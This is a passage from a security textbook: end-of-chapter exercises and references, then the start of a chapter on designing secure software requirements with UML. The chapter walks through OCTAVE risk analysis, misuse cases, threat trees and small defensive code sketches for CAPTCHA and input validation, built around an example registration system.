6. Find Process Flaws. A customer reports that the customer website is vulnerable to SQL attacks. What went wrong during the development stages, as well as in the development process, that allowed this flaw to be released?

7. Web Programming Protections. What security practices would you recommend for a web programmer? Consider each development stage: requirements, analysis/design, coding, testing and deployment.

8. Fuzz Testing. Contrast two fuzz testers (or other testing tools) for the features supported.

22.6.1 Health First Case Study Problems

For each case study problem, refer to the Health First Case Study. The Health First Case Study, Security Workbook and Health First Requirements Document should be provided by your instructor or can be found at https://sn.pub/lecturer-material. Note that the Optional Extensions listed as case studies below are extensions to the named case study. It is recommended that you perform the original case study, or at least read the case study all the way through, before designing the Extension.

Case studies (each uses the Health First Case Study), with other resources:
• Update requirements document to include segregation of duties – Health First Requirements Document
• Fraud: Combatting social engineering. Optional extension: Computerizing the disclosure forms – Health First Requirements Document
• Planning for incident response. Optional: Software design for incident detection – HIPAA slides or notes; Health First Requirements Document
• Defining security metrics. Optional: Designing metrics for the requirements doc – Health First Requirements Document
• HIPAA: Including privacy rule adherence to requirements document – HIPAA slides or notes; Requirements Document
• Application controls: Extending requirements preparation by planning for HIPAA security rule – HIPAA slides or notes; Requirements Document

References

1. Baker W (2022) Baker vs. Twitter Complaint, Case 2:22-cv-06525 Document 1 Filed 09/13/22. https://s3.documentcloud.org/documents/22418476/baker-v-twitter-complaint.pdf
2. PCI (2021) Payment card industry (PCI) software security framework: secure software lifecycle requirements and assessment procedures, v 1.1, Feb 2021. www.pcisecuritystandards.org
3. PCI (2021) Payment card industry (PCI) software security framework: secure software requirements and assessment procedures, v 1.1, Apr 2021. www.pcisecuritystandards.org
4. BSIMM (2020) Building security in maturity model, version 11, Sept 2020
5. OWASP (n.d.) OWASP Software Assurance Maturity Model (SAMM), version 2
6. Dukes L, Yuan X, Akowuah F (2013) A case study on web application security testing with tools and manual testing. In: Proceedings of IEEE Southeastcon, IEEE, pp 1–6
7. Larson D, Liu J (2013) A new security metric for SOA implementation. In: Seventh international conference on software security and reliability companion, IEEE Computer Society, pp 102–108
8. SAFECode (2011) Fundamental practices for secure software development, 2nd edn. Software Assurance Forum for Excellence in Code, 8 Feb 2011. www.safecode.org, pp 1–56
9. SANS (2009) Practical risk analysis and threat modeling spreadsheet. http://cyber-defense.sans.org/blog/2009/07/11/practical-risk-analysis-spreadsheet. Accessed 6 Dec 2014
10. Payne RS (2013) A practical approach to software reliability for army systems. In: 2013 proceedings of the annual reliability and maintainability symposium (RAMS), IEEE, pp 1–5
11. Open Group. CDSA and CSSM, vers 2.3 (with corrigenda) technical standard, Doc. # C914
12. Christey S (2011) 2011 CWE/SANS top 25 most dangerous software errors. 13 Sept 2011. http://cwe.mitre.org/19
13. Kulkarni D, Tripathi A (2010) A framework for programming robust context-aware applications. IEEE Trans Softw Eng 36(2):184–197
14. Simpson S (ed) (2011) Fundamental practices for secure software development, 2nd edn. SAFECode, 8 Feb 2011. http://www.safecode.org/publication/SAFECode_Dev_Practices0211.pdf. Accessed 15 Nov 2014


15. Harris S (2013) All-in-one CISSP® exam guide, 6th edn. McGraw-Hill, New York, pp 1094–1111
16. Sullivan (2014) Security brief: add a security bug bar to Microsoft Team Foundation Server 2010. MSDN Magazine. http://msdn.microsoft.com/en-us/magazine/ee336031.aspx. Accessed 7 Jan 2014
17. Common Criteria (2022) Common Criteria for Information Technology Security Evaluation: Part 1: Introduction and general model, Rev 1, Nov 2022. https://www.commoncriteriaportal.org
18. Chess B, Arkin B (2011) Software security in practice. IEEE Secur Priv 9(2):89–92
19. OWASP (2014) Agile software development: don't forget EVIL user stories. https://www.owasp.org/index.php/Agile_Software_Development:_Don%27t_Forget_EVIL_User_Stories. Accessed 28 Nov 2014
20. Puhakainen A, Sääskilaht J (2012) Mastering security in agile/scrum, case study. http://www.rsaconference.com/writable/presentations/file_upload/asec-107.pdf. Accessed 28 Nov 2014
21. Conklin WA, Shoemaker D (2014) CSSLP® certification all-in-one exam guide. McGraw-Hill Education, New York, NY
22. Common Criteria (2023) Common Criteria: certified products. https://www.commoncriteriaportal.org/products/. Accessed 3 Nov 2023
23. PCI Security Standards Council (2013) Requirements and security assessment procedures, v 3.0, Nov 2013. www.pcisecuritystandards.org

Chapter 23

Planning for Secure Software Requirements and Design with UML

Computers have a strange habit of doing what you say, not what you mean. – CWE/SANS Top 25 Monster Mitigations [1]

It is not possible to build an excellent software product quickly without understanding the requirements. Sometimes security is added at the end of the project, after the main software is functional. It is known in the security world (and required by GDPR) that "Building Security In" is the best approach to secure software; in fact, that phrase is part of the name of the maturity model: Building Security In Maturity Model (BSIMM). By building security in, the code is written properly the first time, saving time in the long run. At the basic level, BSIMM recommends risk analysis to rank threats. At the intermediate level, organizations shall also institute approved methods of architectural analysis, such as the methods described in this chapter [26].

This chapter builds on the Unified Modeling Language (UML), commonly used in design. UML, and the models described here, can offer a high-level overview of security controls. Because "a picture is worth one thousand words," it is possible to diagram, refine and communicate a security design easily. This iteration and review process enables a design to be thought through well before the first release of code. It is recommended to explain diagrams with text, to help thoroughly think through issues. Remember that any flaws you find in the design stage reduce rewrite time in the coding and test stages. (The author can testify to rethinking and redrawing the diagrams in this chapter again and again!) In addition, security documentation is required for certification, is helpful in preventing and arguing legal issues, and can be reused for similar future projects.

If the reader has not yet developed expertise in UML, an introduction to each UML diagram is provided before its security enhancements are described. This chapter first describes useful security principles used in design. Then an example registration application is designed, using secure UML, for the requirements and design stages. Finally, the design requirements for PCI DSS-certified software are briefly outlined.


23.1 Important Concepts and Principles in Secure Software Design

There is a set of important principles for secure software design.

The principles can be grouped into four areas:

• Usability: Psychological acceptability; Trust relationship; Least astonishment
• Authorization: Least privilege; Complete mediation; Fail safe/fail secure
• Efficiency: Modularity, encapsulation, abstraction; Open design; Economy of mechanism (simplicity of design)
• Fortification: Reduce attack surfaces; Least common mechanism (separation, isolation); Layering (defense in depth)

The first area, Usability, is the goal that users are willing to use the secured software.

Usability  This principle, also known as Psychological Acceptability, states that security implementations should not make a resource more difficult to use than an implementation without security [2, 3]. In other words, there must be a balance between usability and security. If security makes a product too difficult to use, users will find workarounds to accomplish their goals. Shadow IT arises where users adopt (for example) unsecured cloud services instead of the app that was designed for them.

Trust Relationship  The system, including all information and security mechanisms, is considered safe. To transact, a user must feel they are working with a safe organization, a safe network, and safe computer systems. If any of these are lacking, the user may postpone the transaction until conditions are right, or look elsewhere. The additional principle of Transitive Trust states that if A trusts B, and B trusts C, then A trusts C [3]. This concept is used by the different levels of Certificate Authorities to enable trust in digital certificates.

Least Astonishment  Security mechanisms should be understandable to users and work effectively within users' activities [3]. Some security features (e.g., passwords) may be a bother, but users understand the need and how the functions work.


The second goal, Efficiency, centralizes control of security, to prevent the use of a hodgepodge of similar controls of differing effectiveness.

Economy of Mechanism or Simplicity of Design  Security mechanisms should be as simple as possible to implement (or program or test) [2, 3]. If a mishmash of security features is used, then attackers can (and do) find alternative ways to enter and take advantage of the weakest link. For example, it is not useful to have many authorization mechanisms; instead it is useful to have one excellent multifactor implementation that all services use. Therefore, security is generally implemented within one standardized security package's Application Programming Interface (API), which is carefully vetted and patched when necessary. This focus on one good implementation is also efficient from the programming perspective.

Abstraction, Modularity, Encapsulation  To implement Economy of Mechanism, it is important to encapsulate security features in a modular way. Modularity enables program reuse, with little to no customization for different applications [6]. Encapsulation hides attributes and the logic of methods within objects. Abstraction provides access to interfaces, defined only as method signatures, enabling multiple implementations for different devices or systems as necessary; abstraction enables a selection of similarly-interfaced modules, potentially through inheritance. Fortunately, modular, encapsulated code is a simple style of coding, enabling code reuse. Here are two applications:

• Software design: Modularity tries to model the real world, by defining classes (or packages) to represent a single concept each [7]. Encapsulation hides class attributes and logic behind a class method interface; if fixes or enhancements need to be made, attributes can be changed and methods reprogrammed, but method signatures remain unaffected, avoiding changes to existing calling programs. This enforces simplicity, since the logic within a class does not need to be understood by calling programs.
• Security design: Modularity hides security functions within the security software. Attributes and internal security code do not need to be understood by software developers, who can simply use the provided, secured features in a simple way.

Open Design  This principle assumes the attacker knows your system: the algorithm is known, whether through espionage, reverse engineering and/or research [2, 3]. The system must be strong enough that even when the attacker has the code, they cannot break in. Examples of this are encryption algorithms (AES, RSA) and integrity algorithms: these algorithms have been publicly studied for years, and their security status is known and relied upon.

The third goal, Authorization, provides access only to allow persons to do their primary job and no more. These principles were introduced fully in Chap. 21 on Software Threats and Vulnerabilities, and are reviewed here:


Least Privilege  In the software world, least privilege provides the program and the user the minimum required privileges at the time of execution [2, 3].

Complete Mediation  Access rights are completely validated every time an access occurs [2, 3].

Fail Secure Default  Security policy defines that a subject is given access to an object only when access is explicitly defined, and that authorized use of data and control is restricted by security mechanisms (even when they are not fully functional) [2, 3].

The final goal, Fortification, ensures that security is robust:

Reduce Attack Surfaces  Risk analysis attempts to mitigate vulnerabilities, by minimizing their impact or frequency, or by avoiding risky behavior altogether (e.g., not saving confidential data).

Least Common Mechanism or Minimization of Implementation  It is important to separate and isolate services from each other, by not sharing devices [2, 3]. If system A is broken into and is not separated and isolated, it will be easy to break into other systems on the same device or network zone. Thus, multiple services sharing a device can lead to additional, shared vulnerabilities and provide opportunities for attackers to abuse one service as a springboard into other services. Here are two applications:

• Network Security: Different zones, physical servers and virtual machines separate systems from each other. (See the chapter on Secure Networks.)
• Software Security: Reduce features to the bare minimum required (including in third-party software); separate commercial code from development and test code; separate permissions for code development by project; put unrelated project files in separate, protected directories [8].

Defense in Depth or Layering  Layering of defenses ensures that if an attacker penetrates one layer, they are stopped by the next layers. Layers of software defenses may include authentication, access control, logging, code reviews, input validation, vulnerability tests, etc. A minimal sketch combining several of the authorization principles follows.
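As a hedged illustration of three of the authorization principles working together (the DocumentStore class and its permission scheme are invented for this sketch, not taken from any particular framework), the access check below denies by default (fail secure), is consulted on every access (complete mediation), and grants only the specific right requested (least privilege):

import java.util.Map;
import java.util.Set;

public class DocumentStore {

    enum Right { READ, WRITE }

    // Hypothetical permission table: user -> rights granted on this store
    private final Map<String, Set<Right>> grants;

    DocumentStore(Map<String, Set<Right>> grants) {
        this.grants = grants;
    }

    // Complete mediation: called on EVERY access, never cached by callers.
    // Fail secure: unknown users and unknown rights fall through to "deny".
    private boolean permitted(String user, Right right) {
        Set<Right> rights = grants.get(user);
        return rights != null && rights.contains(right);   // default is deny
    }

    String read(String user, String docId) {
        if (!permitted(user, Right.READ))            // least privilege: only the
            throw new SecurityException(             // READ right is consulted
                "read denied for " + user);
        return fetch(docId);
    }

    private String fetch(String docId) {
        return "contents of " + docId;               // stub for the sketch
    }
}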

23.2 Evaluating Security Requirements

The purpose of the Requirements Stage is to determine what the product to be developed will do, who will be using it, and why it is being developed [24]. This stage involves interviewing the customer to find out how the software should look, act and perform; developing a prototype; and possibly developing a requirements document, which serves as a contract between the software developers and the customer.


Fig. 23.1  Registration use case diagram. (Actors: Client, Provider. Use cases: Register, Enter Feedback, Send Email Update.)

This chapter provides an example of a simple application: a registration system, which distributes documentation or source code to any person who registers for it. Figure 23.1 shows a simple UML Use Case Diagram for the registration system. In this figure, a Client actor Registers for documentation by entering their name, email and job function, and can Send Feedback after they receive the documentation. The Provider actor may Send Email to the Clients, notifying them of any updates to the documentation. In a Use Case Diagram, actors, shown as stick figures with identifier labels, are the planned users of the system [4]. The diagram also shows ovals, called Use Cases, each of which names one basic user feature.

Now that you understand the basic demo application, we will proceed with designing requirements for it. The first step is risk analysis. The OCTAVE Security Requirements Process defines how risk analysis (also known as threat modeling) can be performed for software. (OCTAVE is an abbreviation for Operationally Critical Threat, Asset and Vulnerability Evaluation.) OCTAVE steps include [12]:

1. Identify critical assets
2. Define security goals
3. Identify threats
4. Analyze risks
5. Define security requirements

23.2.1 Step 1: Identify Critical Assets

The first step, Identify Critical Assets, is concerned with describing the assets (e.g., data) that the software will be working with. Figure 23.2 shows a Business Process Model (or Activity Diagram) for the Registration System, split into two parts to demonstrate a flow chart for each of the two actors, Client and Administrator.


Fig. 23.2  Business process model for registration system (parallel flows for the Client and Administrator actors, reading and writing the Contact Info, Comments and Documents data)

The solid bullet is where each user starts, and each actor performs the activities (shown as rounded-corner rectangles) in the order the arrows indicate. Notice that the data, shown as squared-off rectangles, are either created or accessed by the actors. When the arrow points to the data, the data is created or modified, whereas when the arrow points to the process, the process is reading the data. In any case, the assets considered during this risk assessment are the data shown in Fig. 23.2: Contact Information, Materials and Comments. These represent the 'Contact' registration information (name, email, job function), the 'Materials' to be distributed, and the feedback 'Comments', respectively.

23.2.2 Step 2: Define Security Goals

The second OCTAVE step, Define Security Goals, considers how the three security goals (confidentiality, integrity and availability) each relate to the three data assets of the Registration System. In Table 23.1, each data asset is rated from 1–3, representing low (*), moderate (**) and high (***), for each security goal.

Table 23.1  Define security goals

Assets        Confidentiality         Integrity                                        Availability
Contact info  ** No PII maintained    *** Require accurate list of interested persons  * Weekly backup
Materials     * Public with login     *** Accurate – tamper-proof                      ** 24/7 preferred
Comments      ** Confidential pref.   *** Accurate – tamper-proof                      * Weekly backup, email

For this example, we want to distribute the materials to the public (preferably with their registration), so the requirement for Confidentiality of Materials is rated low = 1. However, we would like the materials to be accurate, so the requirement for Integrity of Materials is rated high = 3. Availability of the materials is important; however, since the materials are free, if the registration system is down for a couple of days there is reputational but no financial loss. Therefore, the requirement for Availability of Materials is rated moderate = 2.

23.2.3 Step 3: Identify Threats

The third OCTAVE step, Identify Threats, considers what threats the software may be vulnerable to. It is important to consider adversaries and what they are interested in. One simple threat model considering technical attacks is the STRIDE threat model, where each letter in STRIDE represents a threat to consider (S = Spoof identity, T = Tamper with data, R = Repudiation, I = Info Disclosure, D = Denial of Service, E = Elevation of Privilege) [27]. The Open Threat Taxonomy, published by Enclave Security [5], is a more comprehensive threat model that also considers errors, failures, and non-technical issues. Its abbreviated, diagrammed version is shown in Fig. 23.3. Table 23.2 lists other, more extensive databases of threats and vulnerabilities maintained by MITRE. One more extensive threat model is provided by the Common Attack Pattern Enumeration and Classification (CAPEC™) initiative (https://capec.mitre.org); Table 23.2 summarizes its categories. MITRE's Common Weakness Risk Analysis Framework recommends prioritizing weaknesses from its accumulated weakness list specifically for individual software projects. An organization should therefore prioritize and address its highest priority risks. After gaining an understanding of threats, we apply them to the Registration System in Fig. 23.4. This MisUse Case Diagram is an extension of the primary Use Case Diagram, which also shows the attacks a cracker or fraudster may use to threaten the system. The MisUse Case Diagram names attackers, called Misusers, and black MisUse Case ovals, to name potential attacks [13]. The dotted arrows point from the MisUse Cases to the Use Cases they threaten.


Fig. 23.3  Open threat taxonomy, version 1.1, Enclave Security [5] (threat categories: Personnel, Resource, Property Loss, Technical and Physical threats)

Table 23.2  Table of vulnerability databases

Common Vulnerability Enumeration (CVE): The purpose is to "identify, define, and catalog publicly disclosed cybersecurity vulnerabilities." Catalogs and describes close to 200,000 vulnerabilities. https://cve.mitre.org/

Common Weakness Enumeration (CWE): Lists the top 25 most dangerous weaknesses in software: https://cwe.mitre.org/top25/archive/2022/2022_cwe_top25.html

Common Attack Pattern Enumeration and Classification (CAPEC): The goal is a "comprehensive dictionary of known patterns of attack employed by adversaries to exploit known weaknesses in cyber-enabled capabilities." This site catalogs 560 attack patterns divided into categories of software, hardware, communications, supply chains, social engineering and physical security. https://capec.mitre.org/

MisUse Cases are labeled similarly to Use Cases, in 'Verb Noun' or 'Verb Adjective Noun' form, such as 'Launch DOS' or 'Change Valid Data'. In original versions of the diagrams, users and misusers were drawn in different colors. Since color-coding users could be interpreted as racist (although that is likely not what the original authors intended), we have chosen a different coding: in this book, users are solid and misusers are striped. These diagrams were drawn easily with Microsoft Visio, starting from a UML Use Case Diagram (selecting "Software and Database" -> Software -> UML Use Case Diagram), then modified to add more shapes.


Fig. 23.4  Registration MisUse case diagram (misusers Deviant Client and Attacker, with misuse cases Circumvent Registration, Enter Invalid Registration, Launch DOS and Attack SQL threatening the Client and Provider use cases)

A Threat Tree may alternatively be used to investigate and document likely attacks [15], such as in Fig. 23.5. An advantage of developing a Threat Tree is that it is portable to other similar products and environments: a good threat tree can be reused from one similar product to another, and need only be maintained as new threats, products, and/or environments arise. Figure 23.5 was drawn as a Microsoft Visio Brainstorming Diagram. As part of our Identify Threats stage, there are four main attacks we discuss in depth. The first is that someone might obtain materials without registering, for example by searching the Internet for them. The second is that someone gives false or incorrect identification information rather than properly registering. The third is a Denial of Service, where an automated system registers random garbage, quickly filling up our database with garbage registrants. The fourth is an SQL attack, where an attacker adds SQL commands to our form input to perform unintended database commands. For more complex threats, it may be useful to outline how the attack could occur and how it will be mitigated. For each non-trivial misuse case, we can create one MisUse Case Description. The MisUse Case Description describes the steps of an attack [16], similar to how a Use Case Description may describe the steps of a normally executing process. Table 23.3 shows the detailed Launch Denial of Service MisUse Case attack. The Basic Path is a numbered outline of the steps of the attack. The Alternate Paths section describes slightly variant attack methods. The Mitigation Points section describes how we intend to defend against this attack type.

Fig. 23.5  Threat tree for registration system (root threats: DOS against availability, via filling DB resources or failing the system with a bug; password attack and bypassed registration against confidentiality; SQL attack, invalid registration and cross-site scripting against integrity)

Table 23.3  Launch Denial of Service MisUse case

MisUse case: Launch Denial of Service
Summary: An attacker issues repeated registrations, filling the database with fake data and depleting system and file resources.
Basic path:
1. Do forever
2.  The attacker requests a registration form
3.  The attacker sends random fake data in the form
4. Enddo
Alternative paths:
AP1. Repeat data is entered
Mitigation points:
MP1. At BP Steps 2–3, use CAPTCHA in the registration form to avoid bot attacks.
MP2. At BP Step 3, validate data: no duplicates, data type matching

Our Mitigation Point 1 (MP1) says that at Basic Path (BP) Steps 2–3 we will use CAPTCHA to avoid a Distributed Denial of Service (DDOS) attack. A CAPTCHA requests that users enter the letters/numbers shown in an image on the form; it is used to maximize the likelihood that the user is a real person and not an automated program. CAPTCHA is useful for systems lacking multifactor authentication or well-designed password systems, which otherwise automatically filter out automated attacks.
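To make MP1 concrete, the following minimal sketch (function and variable names are our own, hypothetical choices) issues a random CAPTCHA challenge with the registration form, stores the expected answer server-side, and verifies each challenge exactly once:

```python
import secrets
import string

_pending = {}  # challenge_id -> expected answer (server-side session store)

def issue_captcha() -> tuple[str, str]:
    """Return (challenge_id, answer); the answer is rendered as a distorted image."""
    answer = "".join(secrets.choice(string.ascii_uppercase) for _ in range(6))
    challenge_id = secrets.token_urlsafe(16)
    _pending[challenge_id] = answer
    return challenge_id, answer

def verify_captcha(challenge_id: str, user_input: str) -> bool:
    """One-shot check: each challenge may be used only once."""
    expected = _pending.pop(challenge_id, None)
    return expected is not None and secrets.compare_digest(expected, user_input.upper())
```

Because each challenge is deleted when checked, a bot cannot replay one solved CAPTCHA to submit many registrations.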


In some cases, more extensive documentation is required, such as in the case where users may bypass our registration system and go straight for our documented materials. Heavyweight MisUse Case Descriptions include additional information, such as: Extension Points, Triggers, Preconditions, Assumptions, Mitigation Guarantee, Related Business Rules, Stakeholders and Threats, Terminology and Explanations, Scope, Abstraction Level and Precision Level [16]. An example MisUse Case Description with more of these options is shown in Table 23.4, which describes how a user could bypass registration. This description includes a Precondition, Related Business Rule and Mitigation Guarantee.

23.2.4 Step 4: Analyze Risks

After identifying threats, it is important to prioritize them. The fourth OCTAVE step is Analyze Risks. In this step, SANS recommends considering the damage that may arise from loss of reputation, loss of user productivity, and legal issues. We also consider the ease of attack, the ease of attack repetition, and the ease of detecting a successful penetration [17]. Similar to calculating organizational risk, the risk priority is calculated as Impact multiplied by Likelihood. In Table 23.5, both Impact and Likelihood are rated on a 1–10 scale. Any threat which negatively affects the database is considered serious. Invalid Input affects only one user's registration, and so has a low impact rating.

Table 23.4  Circumvent registration MisUse case

Misuse case: Circumvent Registration
Summary: Deviant client bypasses registration by going directly to the download web page.
Precondition: Client does a Google search and finds a link to the download web page, OR obtains the link from a colleague.
Basic path:
1. DeviantClient obtains web reference from Google or a friend.
2. DeviantClient uses the web reference to download materials without registering.
Mitigation points:
MP1: Web page has no other web references.
MP2: Registration is confirmed by an email response.
MP3: Email response includes a dynamic web page with a unique reference. This web page is accessible only if a key is provided during registration. Key expires in 1 week.
Related business rule: Users must register to obtain materials.
Mitigation guarantee: MP1 and MP3 solve Google search problems. MP3 could be used by friends for 1 week, which is acceptable.

Table 23.5  Risk analysis

Threat                                            Impact  Likelihood  Priority = I × L
DOS                                               7       7           49
SQL attack (affects integrity, confidentiality)   7       7           49
Invalid input                                     2       7           14
Circumvent input                                  4       7           28


The final priority scores are high (49) for Launch DOS and SQL Attack, moderate (28) for Circumvent Input, and low (14) for Invalid Input.
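The priority arithmetic of Table 23.5 is simple enough to script. The following sketch reproduces it, using the impact and likelihood ratings taken directly from the table:

```python
# Threat name -> (impact, likelihood), both on a 1-10 scale (from Table 23.5).
threats = {
    "DOS": (7, 7),
    "SQL attack": (7, 7),
    "Invalid input": (2, 7),
    "Circumvent input": (4, 7),
}

# Priority = Impact x Likelihood; list the highest-priority threats first.
for name, (impact, likelihood) in sorted(
        threats.items(), key=lambda t: t[1][0] * t[1][1], reverse=True):
    print(f"{name:18s} priority = {impact * likelihood}")
# DOS and SQL attack score 49; Circumvent input 28; Invalid input 14.
```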

23.2.5 Step 5: Define Security Requirements

The fifth and last OCTAVE step is Define Security Requirements. In this step, we address the threats by adding security functions or features, using a Security Use Case Diagram. We can enhance our MisUse Case Diagram to create the Security Use Case Diagram (retaining a copy of the original MisUse Case Diagram before modifying it!). The Security Use Case Diagram indicates which security features will mitigate specific misuse cases. It may be implemented using either security use cases or security stereotypes. A Security Use Case is an oval describing a security feature or requirement, named in verb-noun or verb-adjective-noun form. Security Use Case notation is shown in Fig. 23.6: our original user feature, shown as a use case, is linked to a security use case, which mitigates one or more misuse cases. Alternatively or additionally, we can include security stereotypes, which describe security features between double angle brackets («…»), as shown in the security use case oval in Fig. 23.6. Stereotypes name security features such as input validation or encryption [4]. Stereotypes can be included in both use cases and security use cases. An optional letter following the description can indicate whether the security feature is a C=Class, O=Object, F=Function, U=Use case or D=Decision symbol. Figure 23.7 is an example Security Use Case Diagram mitigating our four main threats: the Launch DOS, Attack SQL, Circumvent Registration and Enter Invalid Data misuse cases. Description of security features is primarily through stereotypes.

Fig. 23.6  Depiction of a security use case (an Actor's use case and a Misuser's misuse case, each named in verb-adjective-noun form, with a security use case mitigating the misuse case)


Fig. 23.7  Security use case diagram for registration system – draft version (Client use cases Enter Client Info and Enter Feedback; Provider use cases Email Update and Edit/delete Client; misuse cases Circumvent Registration, Enter Invalid Data, Launch DOS and Attack SQL)

Stereotypes for general defenses, such as «validate input», really should appear on every use case. However, certain use cases require specific defenses: "Enter Client Info" requires a «CAPTCHA» stereotype, and "Email Update" requires «validate input» to defend against SQL attacks. If a DOS attack occurs, then we would recover by restoring via a backup or by editing registrations. Therefore, we add a security use case (dark red), "Edit/delete Client", as an option to "Launch DOS". While the security here is improved, it appears unorganized, and we really need some security features repeated across many use cases. "Enter Client Info" will include a «CAPTCHA» check because there is no login-password procedure. We will «validate input» to prevent SQL attacks, redundant registration entries and other mistakes. Because DOS is a severe problem, an added Security Use Case is "Edit/Delete Client", which enables the Administrator to delete suspicious registrations. With further consideration, we can think of more attacks and security requirements. For example, shouldn't there be logins for all Provider use cases, and CAPTCHA and email confirmation for all Client accesses? Is it not possible that SQL attacks and invalid input can occur for any input? Unfortunately, this causes the diagram to become a bit unruly. Inheritance can compress our threats, by having specific threats point to generalized threats. Inheritance can also consolidate security stereotypes, by having specific use cases inherit from general use cases. Inheritance is implemented using an arrow with a full arrowhead pointing to the general case. In Fig. 23.8, Launch DOS and Enter Client Information are both general use cases, and any security stereotypes are shared with the specific use cases pointing to them.


Fig. 23.8  Security use case diagram – final version (specific use cases inherit shared stereotypes such as «validate input» from the general Register and Launch DOS use cases; Launch DOS generalizes Overflow DB and Send Continual Requests, and the security use case Edit/delete Client mitigates Launch DOS)

These diagrams are very helpful for considering which security features address which misuse cases. Adding text to describe the relationships can also help, both to find additional errors and to communicate the security design. To further the design, it is possible to agree on Business Rules and/or prepare Security Use Case Descriptions for complex scenarios. With an agile style, it is possible to proceed at this stage with preparing security stories. It may be useful to include in the Security Requirements the associated Business Rules [14]:

1. Users cannot access the web pages without registering their emails into the system;
2. Email registrations shall be accurate;
3. The database with user emails shall not be easily broken into, requiring 2-factor authentication;
4. It is difficult to circumvent the registration process;
5. The registration system is near-immune to DDOS attacks; and
6. Provider email notifications and obvious attacks are logged and emailed to the administrator.

If further design is desired for complex scenarios, Security Use Case Descriptions can be prepared. Table 23.6 shows the Validate Input Security Use Case, which is patterned after a regular Use Case. The Basic Path describes the overall functions of verifying CAPTCHA, validating input, and checking for duplicate registration entries. The Postcondition describes the attacks that are mitigated as part of this security function. This example has given an overview of the different steps and activities that make up OCTAVE risk analysis using MisUse Cases.


Table 23.6  Validate Input security use case

Security use case: Validate Input
Summary: This validates all client and provider entries on a per-field basis
Precondition: A name, email and job function are provided.
Basic path:
1. For each field: name, email, job, password (if included)
2.  The system checks for valid characters, to prevent SQL injection.
3.  The system checks for a valid name, email, password and job function.
4.  Log both attacks and successful registrations.
5. If email is new to database
6.  Add record to database
7. The system returns "new", "existing" or "failure" to the calling routine.
Postconditions: The input has been checked for bot attempt, SQL injection, and validity. Attacks and successful access are logged.

A Requirements Inspection provides feedback from the customer, experienced security/design staff and/or auditors, to avoid implementation problems. Errors found and fixed at this stage save re-development time and, following deployment, the high costs of security breaches. Also, just as code can be reused, design documentation can similarly be reused.
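A minimal sketch of the Validate Input security use case of Table 23.6 follows. The field patterns, job list, and file name are illustrative assumptions, but the structure mirrors the Basic Path: per-field validation, a parameterized database insert (so SQL text in the input cannot alter the statement), and a "new", "existing" or "failure" result:

```python
import re
import sqlite3

NAME_RE = re.compile(r"^[A-Za-z][A-Za-z .'-]{0,63}$")      # assumed name rule
EMAIL_RE = re.compile(r"^[\w.+-]+@[\w-]+(\.[\w-]+)+$")     # assumed email rule
JOBS = {"developer", "manager", "student", "other"}        # assumed job list

def validate_input(name: str, email: str, job: str) -> str:
    """Returns 'new', 'existing' or 'failure', mirroring Table 23.6 step 7."""
    if not (NAME_RE.match(name) and EMAIL_RE.match(email) and job in JOBS):
        return "failure"   # would also be logged as a possible attack
    with sqlite3.connect("registrations.db") as db:
        db.execute("CREATE TABLE IF NOT EXISTS reg "
                   "(name TEXT, email TEXT UNIQUE, job TEXT)")
        try:
            # Parameterized query: input is bound as data, never parsed as SQL.
            db.execute("INSERT INTO reg VALUES (?, ?, ?)", (name, email, job))
            return "new"
        except sqlite3.IntegrityError:
            return "existing"   # duplicate email: no redundant registration
```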

23.2.6 Specify Reliability, Robustness

The availability requirements are not severe for this registration system. However, for mission-critical systems, such as air transportation or defense software, reliability may be a life-or-death concern. Reliability can be defined as software operating as expected, for a defined duration of time and within defined conditions [18]. Reliability engineers calculate the failure rate of all mission-critical components of a system, to determine the allowable tolerance (or intolerance) for failure. Reliability statistics are defined in the contract and requirements, and then must be implemented in later development stages. Metrics that may be specified in a contract, project plan, reliability plan and/or the non-functional requirements section of the Requirements document include [18]:

• Number of defects in software: failure rate data, measured during test and deployment; or defect density, measured as the number of defects per thousand lines of code.
• Total test time/performance: total test time, total CPU time during testing, and failure execution time.
• Defect elimination metrics: defects found per development stage. A mature organization can predict, for a given size of code, how many defects should be found per development stage through inspection and testing. If the expected defects are not found, quality control is probably lacking and the project is at risk of a high defect rate.


These metrics may be required simply to be reported, and/or the software may be required to achieve a specified level of reliability.
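For example, the first metric above, defect density, is a one-line computation (the figures below are illustrative):

```python
def defect_density(defects_found: int, lines_of_code: int) -> float:
    """Defects per thousand lines of code (KLOC)."""
    return defects_found / (lines_of_code / 1000.0)

# e.g., 42 defects found in 28,000 lines of code is 1.5 defects per KLOC.
print(defect_density(42, 28_000))  # 1.5
```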

23.3 Analysis/Design

The purpose of the Analysis/Design Stage is to determine how the software will be built to fulfill the features specified during the Requirements Stage [24]. During design, the eventual product takes shape and implementation details become known. Considering our Registration System case, new concerns related to a web service implementation will naturally arise during Design. Within UML, two aspects of design include [11]:

1. Static Model: These diagrams show the structure of the software, including classes, components and subsystems.
2. Dynamic Model: These diagrams describe the system behavior, including how each Use Case is executed.

23.3.1 Static Model

In large standardized systems, such as the Open Group's Common Data Security Architecture (CDSAv2), security may be layered as shown in Fig. 23.9 [19]. The application issues requests, possibly through middleware (or data communication services), to the Common Security Services Manager Application Programming Interface (API). Encapsulated within the security manager is a series of security service provider modules, including authorization, digital certificates, encryption and key management, integrity services, and other services which can be configured in. API interfaces are clearly specified.

Fig. 23.9  Open Group's Common Data Security Architecture Version 2 [19] (layers: Application; Layered Services and Middleware; Common Security Services Manager API; and service provider modules for cryptography, trust policy, authorization, certificates and data storage)


Fig. 23.10  Documenting security packages

This implementation takes advantage of software reuse and reliability. Although this is an elegant interface, unfortunately the free Open Group library of code is no longer supported. Regardless of the actual architecture used, during Static Modeling a blueprint of the new service is developed. Subsystems are shown as folders in UML. Figure 23.10 shows how the CAPTCHA and Sanitizer security packages protect the Registration Subsystem. The purpose of the Sanitizer package is to validate (or sanitize) user input. Security packages may be labelled with a stereotype and name, a priority marking showing the priority calculated during Requirements, and one or more threat markings, which describe the threat(s) that the package defends against [20]. At a more detailed (drill-down) level, each subsystem could be diagrammed using a class diagram, showing the internal classes of the subsystem. An alternative method of describing security implementations is to place security stereotypes above package and/or class names [4]. Often, these diagrams may be automatically generated by development tools. An important aspect of class-level design is security design patterns. A selection of classes, with their purposes, services and relationships to other classes, is documented in research papers demonstrating design patterns [25]. Security patterns are shown as UML class diagrams, with text explanation. Investigation of these designs can help shorten the time to development and improve the quality of finished products. Mid-level BSIMM maturity levels recommend using 'secure-by-design' software libraries and services, which are already available to be readily reused. Higher BSIMM maturity levels recommend forming a review committee to find, develop, and publish secure design patterns [26]. (The topic of design patterns would require an additional chapter in itself, so it is only introduced here.) With the Internet, software has become distributed in its deployment and/or use. A Deployment Diagram shows where the various components of the software will reside 